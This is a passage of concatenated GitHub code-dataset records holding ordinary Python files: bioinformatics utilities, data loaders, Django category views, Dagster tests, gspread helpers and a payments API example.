fields[0]\n\t\t\tindividual_id = fields[1]\n\t\t\tlibrary_ids = fields[2:]\n\t\t\tinstances[instance_id] = library_ids\n\t\t\tinstance_to_individual[instance_id] = individual_id\n\t\t\t# check that libraries list does not contain duplicates\n\t\t\tduplicates_check = {}\n\t\t\tfor library_id in library_ids:\n\t\t\t\tif library_id in duplicates_check:\n\t\t\t\t\traise ValueError('Duplicate library {} for instance id {}'.format(library_id, instance_id))\n\t\t\t\tduplicates_check[library_id] = 1\n\treturn instances, instance_to_individual\n\ndef split_pulldowns(instances_to_libraries, minimum_splits=1):\n\t# construct a list of instances that each library appears in\n\tlibrary_id_to_instance = {}\n\tfor instance_id in instances_to_libraries:\n\t\tfor library_id in instances_to_libraries[instance_id]:\n\t\t\t# make a blank list if first appearance of library_id\n\t\t\tif library_id not in library_id_to_instance:\n\t\t\t\tlibrary_id_to_instance[library_id] = []\n\t\t\t# add instance to list\n\t\t\tlibrary_id_to_instance[library_id].append(instance_id)\n\t\n\t# To pass read group checks, we need each read group to appear at most once in each pulldown\n\tnum_pulldowns = max([len(library_id_to_instance[library_id]) for library_id in library_id_to_instance])\n\tnum_pulldowns = max(num_pulldowns, minimum_splits)\n\t# setup enough blank lists to accomodate the most frequent library\n\t# we could also increase this for parallelization\n\tpulldown_instances = []\n\tfor x in range(num_pulldowns):\n\t\tpulldown_instances.append([])\n\tcount = 0\n\t# divide instances among num_pulldowns\n\t# no library will appear in a pulldown twice\n\tused_instances = set()\n\tfor library_id, instance_list in library_id_to_instance.items():\n\t\tfor instance in instance_list:\n\t\t\tif instance not in used_instances:\n\t\t\t\tpulldown_instances[count % num_pulldowns].append(instance)\n\t\t\t\tcount += 1\n\t\t\t\tused_instances.add(instance)\n\treturn 
pulldown_instances\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Prepare pulldown input files for by-sample pulldown batch.\")\n\t\n\tparser.add_argument(\"sample_bam_list\", help=\"Each line contains the instance id and its list of component libraries\")\n\tparser.add_argument('-m', '--minimum_splits', help=\"minimum number of separate pulldowns\", type=int, default='1')\n\t\n\targs = parser.parse_args()\n\t\n\tinstances_to_libraries, instances_to_individual = instances_maps(args.sample_bam_list)\n\tpulldowns_instances = split_pulldowns(instances_to_libraries, args.minimum_splits)\n\tpulldown_index = 1\n\tfor pulldown_instances in pulldowns_instances:\n\t\tfilename = \"pulldown_instances{:02d}\".format(pulldown_index)\n\t\twith open(filename, \"w\") as f:\n\t\t\tfor instance in pulldown_instances:\n\t\t\t\tprint(\"{}\\t{}\\t{}\".format(instance, instances_to_individual[instance], '\\t'.join(instances_to_libraries[instance]).strip()), file=f)\n\t\tpulldown_index += 1\n\t\n","repo_name":"DReichLab/adna-workflow","sub_path":"pulldown_split_bam_list.py","file_name":"pulldown_split_bam_list.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"22794423750","text":"\"\"\"Loads data from csv file.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nimport os.path\n\n\ndef load_train_data():\n data = pd.read_csv('./data/train.csv')\n\n return data\n\n\ndef univariate_data(dataset, start_index, end_index, history_size, target_size):\n data = []\n labels = []\n if os.path.isfile(\"mean_std.txt\"):\n f = open('mean_std.txt', 'rb')\n mean_std = pickle.load(f)\n f.close()\n mean = mean_std[\"mean\"]\n std = mean_std[\"std\"]\n else:\n mean = dataset.mean()\n std = dataset.std()\n\n dataset = (dataset - mean) / std\n\n mean_std = {\"mean\": mean, \"std\": std}\n file = open('mean_std.txt', 'wb')\n pickle.dump(mean_std, file)\n file.close()\n\n start_index = start_index + history_size\n if end_index is None:\n end_index = len(dataset) - target_size\n\n for i in range(start_index, end_index):\n indices = range(i - history_size, i)\n # Reshape data from (history_size,) to (history_size, 1)\n pre_data = []\n for j in indices:\n pre_data.append(dataset[j])\n data.append(np.reshape(pre_data, (history_size, 1)))\n labels.append(dataset[i + target_size])\n return np.array(data), np.array(labels)\n\n\nif __name__ == \"__main__\":\n train_data = load_train_data()\n print(train_data.info())\n print(train_data.describe())\n print(train_data.head())\n plt.plot(train_data['Date'], train_data['ConfirmedCases'])\n plt.show()\n cases_data = train_data[\"ConfirmedCases\"]\n data_set = univariate_data(cases_data, 0, None, 5, 0)\n print(data_set)\n","repo_name":"james20140802/COVID-19","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41819322357","text":"import copy\nfrom scipy.special import softmax\nclass Neighbours:\n\n\n def __init__(self):\n self.central = None\n self.cardinal = []\n self.ordinal = []\n\n def getstatenotopography(self):\n state = 0\n if self.central is not None:\n state += self.central.state\n if len(self.cardinal) > 0:\n state += sum(map(lambda _: 
_.state, self.cardinal))\n if len(self.ordinal) > 0:\n state += sum(map(lambda _: 0.83 * _.state, self.ordinal))\n return state\n\n def getstate(self):\n state = 0\n if self.central is not None:\n state += self.central.state\n if len(self.cardinal) > 0:\n state += sum(map(lambda _: _.state * (((self.central.elevation - _.elevation) / self.sum() if self.sum() > 0 else 1)), self.cardinal))\n if len(self.ordinal) > 0:\n state += sum(map(lambda _: 0.83 * _.state * (((self.central.elevation - _.elevation) / self.sum() if self.sum() > 0 else 1)), self.ordinal))\n return state\n\n\n def getall(self):\n all = []\n all.extend(copy.deepcopy(self.cardinal))\n all.extend(copy.deepcopy(self.ordinal))\n return all\n\n def sum(self):\n all = copy.deepcopy(self.getall())\n all.append(self.central)\n return sum(_.elevation for _ in all)\n\n","repo_name":"JakubMol/bps","sub_path":"Source/pythonProject-20210320T135709Z-001/pythonProject/Neighbours.py","file_name":"Neighbours.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72143147049","text":"\"\"\"\nJacob Padgett\nW09 Prove\nBro Brian Wilson\n\"\"\"\nimport time\n\n\n# Use the lists because the asignment calls for it...\n# even though a dictionary would be a better choice.\nitems = []\nprices = []\n\n# Other variables\nd = \"-\" * 25\npair = \"Price\\tItem\"\nclear = chr(27) + \"[2J\" # clear the terminal\n\nprompt_user = \"\"\"\nWhat would you like to do: (enter the number)\n\n1 - Add a new item\n2 - Display the contents of the shopping cart\n3 - Remove an item (only needed for the final project deliverable)\n4 - Compute the total (only needed for the final project deliverable)\n\n5 - Quit\\n\n\"\"\"\n\nprint(clear)\n\nresponse = None\n\nwhile response != 5:\n\n response = int(input(prompt_user))\n\n # Add a new item\n if response == 1:\n print(clear)\n x = input(\"What is the new item you'd like to add? \")\n time.sleep(0.25)\n y = float(input(f\"What is the price/cost of the {x}: \"))\n print(f\"{clear}Adding {x.upper()} to your cart\\n...Please wait...\")\n time.sleep(1.25)\n items.append(x.title())\n prices.append(y)\n print(clear)\n\n # Display the contents of the shopping cart\n elif response == 2:\n print(clear)\n print(pair)\n print(d)\n\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n\n # Remove an item\n elif response == 3:\n print(clear)\n print(pair)\n print(d)\n\n # display initial cart before item is removed\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n # remove item and price\n delete_item = input(\n \"\\nType the name of the item would you like to remove? 
\"\n ).title()\n\n print(clear)\n print(\"Deleting item\\n...Please wait...\")\n time.sleep(1.5)\n print(clear)\n\n # get the index number for item to be deleted\n idx_num = items.index(delete_item)\n\n items.pop(idx_num)\n prices.pop(idx_num)\n\n # display updated cart\n print(pair)\n print(d)\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n print(clear)\n\n # Compute the total\n elif response == 4:\n print(clear)\n\n # display cart\n print(pair)\n print(d)\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n print(f\"\\nYour total cart value is ${sum(prices):.2f}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n print(clear)\n\nprint(clear)\nprint(\"\\nThanks for using the cart!\\n\")\n","repo_name":"jacobpad/BYUI_CS101","sub_path":"week_09/prove.py","file_name":"prove.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13771370246","text":"import csv\ntry:\n with open(r\"/Users/suratsetthanan/Documents/python/08/fine.csv\",\"w+\", newline=\"\") as fine:\n csvfine = csv.writer(fine)\n csvfine.writerow([\"Apple\",\"Mango\",\"Watermelon\"])\n csvfine.writerow([\"Banana\",\"Lime\",\"Orange\"])\nexcept (FileExistsError, FileNotFoundError):\n print(\"ไฟล์ถูกสร้างแล้ว หรือ ไม่พบตำแหน่ที่ระบุ\")\nelse:\n print(\"เขียนไฟล์สำเร็จ\")","repo_name":"surut555/Python","sub_path":"08/fine_csv.py","file_name":"fine_csv.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16326953592","text":"\"\"\"\nDefine dataset and transforms\n\"\"\"\n\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport glob\nimport os\nimport numpy as np\nimport torch\nfrom skimage.transform import resize\n\n\ndef set_transform(resize=256):\n transform = transforms.Compose([\n transforms.Resize((resize,resize)),\n transforms.ToTensor()\n ])\n\n return transform\n\n\nclass simpleDataset(Dataset):\n def __init__(self, folder, max_files=None, inputs=['vis'], include_stoppage=False, transform=None, resize_dim=256):\n self.folder = folder\n self.paths = glob.glob(os.path.join(folder,'*.npz'))\n self.transform = transform\n self.resize_dim = resize_dim\n self.inputs = inputs\n\n # ignore files that has 'stop' in filename if include_stoppage == False\n if not include_stoppage:\n self.paths = [f for f in self.paths if 'stop' not in f]\n\n\n if max_files and len(self.paths)>max_files:\n self.paths = self.paths[:max_files]\n\n def __len__(self) -> int:\n return len(self.paths)\n\n def __getitem__(self, index: int):\n filepath = self.paths[index]\n saved = np.load(filepath)\n saved = dict(zip((key for key in saved.keys()), (saved[key] for key in saved.keys())))\n saved['vis'] = (saved['psi']>0)*1.0\n\n X = np.stack([resize(saved[name],(self.resize_dim,self.resize_dim),order=0) for name in self.inputs],0)\n X = torch.Tensor(X)\n #X = torch.Tensor(resize((saved['psi']>0)*1.0,(self.resize_dim,self.resize_dim),order=0))\n Y = torch.Tensor(resize((saved['phi']>0)*1.0,(self.resize_dim,self.resize_dim),order=0)).unsqueeze(0)\n\n\n if self.transform:\n X = self.transform(X)\n Y = self.transform(Y)\n\n return X, Y\n\n\nclass CustomDataset(Dataset):\n \"\"\"A custom dataset for loading 2D visibility data\"\"\"\n \n def __init__(self, data_dir, max_files, transform=None, gain_threshold=0, include_stoppage=False):\n 
\"\"\"\n Initialize the dataset object\n \n :param data_dir: data directory \n :param max_files: maximum number of data files to load \n :param transform: optional transform to be applied on a sample \n :param gain_threshold: threshold on the maximum gain of a sample \n :param include_stoppage: whether or not to include stoppage samples \n \"\"\"\n \n # load files from data directory \n self.data_dir = data_dir\n self.files = os.listdir(self.data_dir)[:max_files]\n self.files.sort()\n \n # ignore files that has 'stop' in filename if include_stoppage == False\n if not include_stoppage:\n self.files = [f for f in self.files if 'stop' not in f]\n \n # filter out samples whose maximum gain value is below gain_threshold \n if gain_threshold > 0:\n self.files = [f for f in self.files \n if np.load(os.path.join(self.data_dir, f))['E'].max() >= gain_threshold]\n \n # assign IDs to samples \n self.IDs = np.arange(len(self.files))\n \n # transform to be applied on a sample \n self.transform = transform\n \n \n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n \n return len(self.files)\n \n def __getitem__(self, idx):\n \"\"\"Load and return a sample from the dataset at the given index idx\"\"\"\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n # load sample \n filename = self.files[idx]\n saved = np.load(os.path.join(self.data_dir, filename))\n \n ID = self.IDs[idx] # sample ID\n psi = saved['psi'] # cumulative visibility\n phi = saved['phi'] # scene\n horizons = saved['horizons'] # frontier\n E = saved['E'] # gain function \n \n # convert continuous to discrete \n vis = 1.0*(psi>0)\n scene = 1.0*(phi>0)\n \n # form sample \n sample = {'ID': ID, 'vis': vis, 'scene': scene, 'frontier': horizons, 'gain': E, 'max_gain': E.max()}\n \n # transform sample \n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n \nclass ApplyTransform(Dataset):\n \"\"\"Apply transformations to a Dataset\"\"\"\n \n def __init__(self, dataset, transform=None):\n \"\"\"\n Initialize the dataset object \n \n :param dataset: (Dataset) a Dataset that returns samples\n :param transform: (callable, optional) a function/transform to be applied on the sample\n \"\"\"\n \n self.dataset = dataset\n self.transform = transform\n\n def __getitem__(self, idx):\n \"\"\"Load and return a sample from the dataset at the given index idx\"\"\"\n \n sample = self.dataset[idx]\n if self.transform is not None:\n sample = self.transform(sample)\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n \n return len(self.dataset)\n \n \nclass ScaleGain(object):\n \"\"\"Scale the gain function of a sample by either taking square root or dividing by maximum\"\"\"\n \n def __init__(self, mode):\n self.mode = mode\n \n def __call__(self, sample):\n \n if self.mode == 'none':\n pass\n elif self.mode == 'sqrt':\n sample['gain'] = np.sqrt(sample['gain'])\n elif self.mode == 'div_by_max':\n if sample['max_gain'] != 0:\n sample['gain'] /= sample['max_gain']\n else:\n raise ValueError\n \n return sample\n\n \nclass SelectInputsLabel(object):\n \"\"\"Select inputs to the network\"\"\"\n \n def __init__(self, input_names, label_name):\n self.input_names = input_names\n self.label_name = label_name\n \n def __call__(self, sample):\n\n return {'ID': sample['ID'],\n 'image': np.stack([sample[name] for name in self.input_names], 0),\n 'label': sample[self.label_name],\n 'max_gain': sample['max_gain']}\n\n \nclass ToTensor(object):\n \"\"\"Convert ndarrays of a sample to 
tensors\"\"\"\n \n def __call__(self, sample):\n \n for key in sample.keys():\n sample[key] = torch.tensor(sample[key])\n \n return sample\n \n","repo_name":"c76068/GAN-shape-completion","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74176053287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 1 22:56:38 2019\n\n@author: alkesha\n\"\"\"\n# import the necessary packages\nfrom imutils.video import VideoStream\nimport cv2\n\ntracker =cv2.TrackerCSRT_create()\n \nbounding_box = None\nvideo = VideoStream(0).start()\n\nwhile True:\n frame = video.read()\n frame=frame\n if frame is None:\n break \n (h, w) = frame.shape[:2]\n if bounding_box is not None:\n (t, box) = tracker.update(frame)\n \n if t:\n (x, y, w, h) = [int(v) for v in box]\n cv2.rectangle(frame, (x, y), (x + w, y + h),(0, 111, 0), 3)\n \n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n\n if key == ord(\"c\"):\n bounding_box = cv2.selectROI(\"Frame\", frame, fromCenter=False,\n )\n tracker.init(frame,bounding_box)\n \n elif key == ord(\"q\"):\n break\n\nelse:\n\tvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"freesoul84/100DaysOfMLcode","sub_path":"object_tracking/object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11342577372","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom listArch.Forms.CategoryForm import CategoryForm\nfrom listArch.models.Category import Category\nfrom listArch.models.CategoryDesc import CategoryDesc\nfrom listArch.services import general_methods\nfrom listArch.services.general_methods import category_parent_show\n\n\ndef add_category(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n categories = Category.objects.filter(isActive=True).filter(is_parent=True)\n category_form = CategoryForm()\n try:\n if request.method == 'POST':\n category_form = CategoryForm(request.POST)\n if category_form.is_valid():\n\n category_tr = request.POST['category_description[tr][name]']\n category_eng = request.POST['category_description[eng][name]']\n\n category = Category(name=category_tr, isActive=category_form.cleaned_data['isActive'],\n isBasic=category_form.cleaned_data['isBasic'],\n order=category_form.cleaned_data['order'], icon=request.FILES['icon'],\n is_click=category_form.cleaned_data['is_click'])\n category.save()\n category.slug_save()\n\n if request.POST['category_parent'] == \"\":\n category.is_parent = True\n category.save()\n else:\n category.parent = Category.objects.get(pk=request.POST['category_parent'])\n category.save()\n\n content_tr = request.POST['content[tr]']\n content_eng = request.POST['content[eng]']\n\n category_desc = CategoryDesc(category=category, description=category_eng, lang_code=2,\n definition=content_eng, page_description=request.POST['description[eng]'])\n category_desc.save()\n\n category_desc2 = CategoryDesc(category=category, description=category_tr, lang_code=1,\n definition=content_tr, page_description=request.POST['description[tr]'])\n category_desc2.save()\n\n messages.success(request, \"Kategori Başarıyla eklendi.\")\n return 
redirect('listArch:kategori-ekle')\n else:\n messages.warning(request, \"Alanları Kontrol Edin.\")\n except Exception as e:\n print(e)\n messages.warning(request, '')\n\n return render(request, 'category/add-category.html', {'categories': categories, 'category_form': category_form})\n\n\ndef return_categories(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n cat_array = []\n try:\n categories = CategoryDesc.objects.filter(category__isActive=True).filter(lang_code=1).order_by('category__name')\n\n for category in categories:\n cat_dict = dict()\n parent_cat = category_parent_show(category.category)\n cat_dict['category_name'] = parent_cat\n cat_dict['category'] = category.category\n cat_array.append(cat_dict)\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'category/category-list.html', {'categories': cat_array})\n\n\ndef update_category(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n category = Category.objects.get(pk=pk)\n categories = Category.objects.all()\n category_parent = \"\"\n category_desc1 = \"\"\n category_desc2 = \"\"\n\n cat_array = []\n category_form = CategoryForm(request.POST or None, request.FILES or None, instance=category)\n\n try:\n if category.parent:\n category_parent = category.parent.name\n else:\n category_parent = \"\"\n category_desc1 = CategoryDesc.objects.filter(category=category).filter(lang_code=1)\n category_desc2 = CategoryDesc.objects.filter(category=category).filter(lang_code=2)\n\n for cat in categories:\n cat_dict = dict()\n parent_cat = category_parent_show(cat)\n parent = parent_cat.split(' > ')\n if parent.__len__() == 2:\n cat_dict['category_name'] = parent[0]\n elif parent.__len__() == 3:\n cat_dict['category_name'] = parent[1]\n elif parent.__len__() == 4:\n cat_dict['category_name'] = parent[2]\n\n cat_dict['category'] = cat\n cat_array.append(cat_dict)\n\n if request.method == 'POST':\n if category_form.is_valid():\n\n category_eng = request.POST['category_description[eng][name]']\n category_tr = request.POST['category_description[tr][name]']\n\n category.isActive = category_form.cleaned_data['isActive']\n category.isBasic = category_form.cleaned_data['isBasic']\n category.order = category_form.cleaned_data['order']\n category.icon = category_form.cleaned_data['icon']\n category.name = category_tr\n category.is_click = category_form.cleaned_data['is_click']\n\n category.save()\n\n # TR\n for category_desc_tr in category_desc1:\n category_desc_tr.description = category_tr\n category_desc_tr.definition = request.POST['content[tr]']\n category_desc_tr.page_description = request.POST['description[tr]']\n category_desc_tr.save()\n\n # ENG\n for category_desc_eng in category_desc2:\n category_desc_eng.description = category_eng\n category_desc_eng.definition = request.POST['content[eng]']\n category_desc_eng.page_description = request.POST['description[eng]']\n category_desc_eng.save()\n\n if category.isBasic:\n category.parent = None\n category.is_parent = True\n category.icon = category_form.cleaned_data['icon']\n category.save()\n else:\n category.parent = Category.objects.get(pk=request.POST['category_parent'])\n category.save()\n\n messages.success(request, \"Kategori Başarıyla Düzenlendi.\")\n return redirect('listArch:kategori-listesi')\n else:\n messages.success(request, \"Alanları Kontrol Edin.\")\n except 
Exception as e:\n        print(e)\n        return redirect('listArch:admin-error-sayfasi')\n\n    return render(request, 'category/category-update.html',\n                  {'parent': category_parent, 'category_tr': category_desc1[0],\n                   'category_eng': category_desc2[0],\n                   'categories': cat_array, 'category': category, 'category_form': category_form})\n\n\ndef delete_category(request):\n    perm = general_methods.control_access(request)\n\n    if not perm:\n        logout(request)\n        return redirect('accounts:login')\n    if request.method == 'POST':\n        try:\n\n            category_id = request.POST['category_id']\n            category = Category.objects.get(pk=category_id)\n            category_parent = Category.objects.filter(isActive=True).filter(parent=category)\n            if category_parent.count() == 0:\n                category.isActive = False\n                category.save()\n                return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n            else:\n                return JsonResponse({'status': 'Error', 'messages': 'Üst Kategori Silinemez !! '})\n\n        except Exception as e:\n\n            return JsonResponse({'status': 'Fail', 'msg': e})\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/CategoryViews.py","file_name":"CategoryViews.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37753928117","text":"def wave(string):\n    if string is None:\n        return []\n    lista = []\n    for count, char in enumerate(string):\n        # build the \"wave\": one copy of the word per position, with just\n        # that character uppercased (non-letters such as spaces are skipped)\n        if char.isalpha():\n            lista.append(string[:count] + char.upper() + string[count + 1:])\n    return lista\n\n\nprint(wave('test'))\n","repo_name":"Akaidmaru/random_python","sub_path":"wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72280059368","text":"import re\nfrom functools import reduce\n\nrulePattern = re.compile(\"^(.+): (\\d+)-(\\d+) or (\\d+)-(\\d+)$\")\n\n\ndef getInput():\n    with open(\"16.txt\") as f:\n        rules, ticket, otherTickets = f.read().split(\"\\n\\n\")\n    ruleDict = {}\n    for r in rules.split(\"\\n\"):\n        g = re.match(rulePattern, r).groups()\n        ruleDict[g[0]] = set(range(int(g[1]), int(g[2])+1)\n                            ) | set(range(int(g[3]), int(g[4])+1))\n\n    return ruleDict, ticket, otherTickets.split(\"\\n\")\n\n\ndef main():\n    rules, ticket, tickets = getInput()\n    nearbyTickets = list(\n        map(lambda x: list(map(lambda x: int(x), x.split(\",\"))), tickets[1:]))\n    allowedNums = [y for ys in rules.values() for y in ys]\n\n    print(\"Part 1: {}\".format(\n        sum([y for ys in nearbyTickets for y in ys if y not in allowedNums])))\n\n    validTickets = list(filter(lambda y: all(\n        map(lambda x: x in allowedNums, y)), nearbyTickets))\n\n    # Figure out which columns can be which key (type etc.)\n    found = {}\n    for key in rules.keys():\n        for col in range(len(validTickets[0])):\n            if all(map(lambda x: x in rules[key], list(map(lambda x: x[col], validTickets)))):\n                if col not in found:\n                    found[col] = [key]\n                else:\n                    found[col].append(key)\n\n    # Go over the column-key candidates and eliminate the columns that can take only one key\n    final = {}\n    changed = 1\n    while changed > 0:\n        changed = 0\n        for k, v in found.items():\n            if len(v) == 1 and v[0] not in final:\n                final[v[0]] = k\n                changed += 1\n            elif len(set(v) - set(final.keys())) == 1:\n                newK = (set(v) - set(final.keys())).pop()\n                if newK not in final:\n                    final[newK] = k\n                    changed += 1\n\n    departureIdx = [v for k, v in final.items() if k.startswith(\"departure \")]\n    ticket = list(map(lambda x: int(x), ticket.split(\"\\n\")[1].split(\",\")))\n\n    
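# 'final' now maps every field name to its resolved column index, so\n    # Part 2 is just the product of this ticket's values over the\n    # departure columns.\n    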
print(\"Part 2: {}\".format(\n reduce(lambda a, b: a*b, [ticket[i] for i in departureIdx])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Flourish3/AdventOfCode","sub_path":"2020/python/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9889121847","text":"import tempfile\n\nimport pytest\nfrom click.testing import CliRunner\nfrom dagster._cli.instance import get_concurrency, set_concurrency\nfrom dagster._core.instance_for_test import instance_for_test\n\n\n@pytest.fixture(name=\"instance_runner\")\ndef mock_instance_runner():\n with tempfile.TemporaryDirectory() as dagster_home_temp:\n with instance_for_test(\n temp_dir=dagster_home_temp,\n overrides={\n \"event_log_storage\": {\n \"module\": \"dagster.utils.test\",\n \"class\": \"ConcurrencyEnabledSqliteTestEventLogStorage\",\n \"config\": {\"base_dir\": dagster_home_temp},\n }\n },\n ) as instance:\n runner = CliRunner(env={\"DAGSTER_HOME\": dagster_home_temp})\n yield instance, runner\n\n\n@pytest.fixture(name=\"unsupported_instance_runner\")\ndef mock_unsupported_instance_runner():\n with tempfile.TemporaryDirectory() as dagster_home_temp:\n with instance_for_test(temp_dir=dagster_home_temp) as instance:\n runner = CliRunner(env={\"DAGSTER_HOME\": dagster_home_temp})\n yield instance, runner\n\n\ndef test_get_concurrency(instance_runner):\n instance, runner = instance_runner\n result = runner.invoke(get_concurrency)\n assert result.exit_code == 1\n assert \"Must either specify a key argument or\" in result.output\n\n result = runner.invoke(get_concurrency, [\"--all\"])\n assert result.exit_code == 0\n assert \"No concurrency limits set.\" in result.output\n\n instance.event_log_storage.set_concurrency_slots(\"foo\", 1)\n instance.event_log_storage.set_concurrency_slots(\"bar\", 1)\n\n result = runner.invoke(get_concurrency, [\"foo\"])\n assert result.exit_code == 0\n assert \"bar\" not in result.output\n assert '\"foo\": 0 / 1 slots occupied' in result.output\n\n result = runner.invoke(get_concurrency, [\"--all\"])\n assert result.exit_code == 0\n assert '\"foo\": 0 / 1 slots occupied' in result.output\n assert '\"bar\": 0 / 1 slots occupied' in result.output\n\n\ndef test_set_concurrency(instance_runner):\n instance, runner = instance_runner\n assert instance.event_log_storage.get_concurrency_info(\"foo\").slot_count == 0\n result = runner.invoke(set_concurrency, [\"foo\", \"1\"])\n assert result.exit_code == 0\n assert \"Set concurrency limit for foo to 1\" in result.output\n\n\ndef test_unsupported(unsupported_instance_runner):\n _instance, runner = unsupported_instance_runner\n result = runner.invoke(get_concurrency)\n assert result.exit_code == 1\n assert \"does not support global concurrency limits\" in result.output\n\n result = runner.invoke(set_concurrency, [\"foo\", \"1\"])\n assert result.exit_code == 1\n assert \"does not support global concurrency limits\" in result.output\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/cli_tests/command_tests/test_concurrency_command.py","file_name":"test_concurrency_command.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"8326955503","text":"import gspread\nfrom gspread_formatting.dataframe import format_with_dataframe\nfrom gspread_formatting import DataValidationRule, BooleanCondition, 
set_data_validation_for_cell_range\nfrom gspread_dataframe import get_as_dataframe, set_with_dataframe\nimport orders_update\n\n\ndef set_updated_orders(time, googlesheet_name, worksheet_name, account=gspread.service_account(filename='vol/creds.json')):\n gp = account\n googlesheet = gp.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n df = orders_update.select_current_orders(time)\n df_len = df.shape[0]\n set_with_dataframe(worksheet, df)\n add_checkboxes('H', 2, df_len)\n format_with_dataframe(worksheet, df, include_column_header=True)\n\n\ndef take_df_from_spreadsheet(googlesheet_name, worksheet_name, usecols,\n account=gspread.service_account(filename='vol/creds.json')):\n gp = account\n googlesheet = gp.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n df = get_as_dataframe(worksheet, parse_dates=True, usecols=usecols, skiprows=1, header=None)\n\n return df\n\n\ndef add_checkboxes(column, start_val, stop_val, account=gspread.service_account(filename='vol/creds.json'),\n googlesheet_name='Orders', worksheet_name='Orders_latest'):\n service = account\n googlesheet = service.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n validation_rule = DataValidationRule(\n BooleanCondition('BOOLEAN', ['TRUE', 'FALSE']), # condition'type' and 'values', defaulting to TRUE/FALSE\n showCustomUi=True)\n\n set_data_validation_for_cell_range(worksheet, column + f'{start_val}' + ':' + column + f'{stop_val + 1}',\n validation_rule)\n\n\ndef clear_worksheet(googlesheet_name, worksheet_name, account=gspread.service_account(filename='vol/creds.json')):\n service = account\n googlesheet = service.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n worksheet.clear()\n\n\ndef append_row_order(row, info, account=gspread.service_account(filename='vol/creds.json')):\n \"\"\"\n\n :param row: row = [code, car_num, car_brand, Time, Time_of_arrival]\n :param info: info = (Name, Phone, Home_num)\n :param account: gspread account\n :return: adds a row to the Orders_all worksheet\n \"\"\"\n\n googlesheet = account.open('Orders')\n worksheet = googlesheet.worksheet('Orders_completed')\n\n line = [row[0], row[1], row[2], str(row[3]), info[0], info[1], info[2], row[4]]\n worksheet.append_row(line)\n","repo_name":"vanya-robot/passbot","sub_path":"spreadsheets.py","file_name":"spreadsheets.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17944940273","text":"from __future__ import print_function\nimport tap\n\n######################\n# Token Creation\n######################\n\ndata = {\n \"card\": {\n \"number\": 5123450000000008,\n \"exp_month\": 12,\n \"exp_year\": 21,\n \"cvc\": 124,\n \"name\": \"test token\",\n \"address\": {\n \"country\": \"Kuwait\",\n \"line1\": \"Salmiya, 21\",\n \"city\": \"Kuwait city\",\n \"street\": \"Salim\",\n \"avenue\": \"Gulf\"\n }\n },\n \"client_ip\": \"192.168.1.20\"\n}\n\nresp = tap.Token.create(**data)\nprint('Success: 